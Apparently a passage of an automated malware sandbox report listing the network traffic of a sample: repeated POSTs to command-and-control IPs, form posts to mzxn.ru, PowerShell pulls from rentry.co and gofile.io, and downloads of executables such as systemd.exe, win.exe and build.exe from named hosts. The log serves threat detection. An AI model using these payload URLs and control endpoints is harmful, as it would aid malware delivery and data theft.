Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ntsgigbhjmdewium.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xxoccdqcbwgkfun.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://brsvjaqkplqcgpbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://micjtprwldhqig.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nsmonxwrtdtb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jcdtuefeynnuyume.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jmeyyrwebcswyji.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://csqyjswelakff.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uiqytnopuefi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sqybtthvvjvcy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uancqnbiphxqrd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://voprlhobiib.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ychtpaufegv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kabrxolnvhyrwjnc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dbnuufytckctj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://alsfxtrkgnqwrtmu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jhgsrssviwperqc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qtugjgfklgqqb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lgvneckioyenslmr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hqtvwjoqbrnqlnm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oumdrdjjbggqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gwdkbhdjbqj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://njjerjslsvwgqvn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uhrlndgkepvaqel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpegpuimxnr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: mzxn.ru

Source: unknown

HTTPS traffic detected: 172.67.213.85:443 -> 192.168.2.4:50782 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212

Source: global traffic	DNS traffic detected: DNS query: mzxn.ru
Source: global traffic	DNS traffic detected: DNS query: mussangroup.com
Source: global traffic	DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic	DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic	DNS traffic detected: DNS query: rentry.co
Source: global traffic	DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic	DNS traffic detected: DNS query: liernessfornicsa.shop

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 8179

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 06:53:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
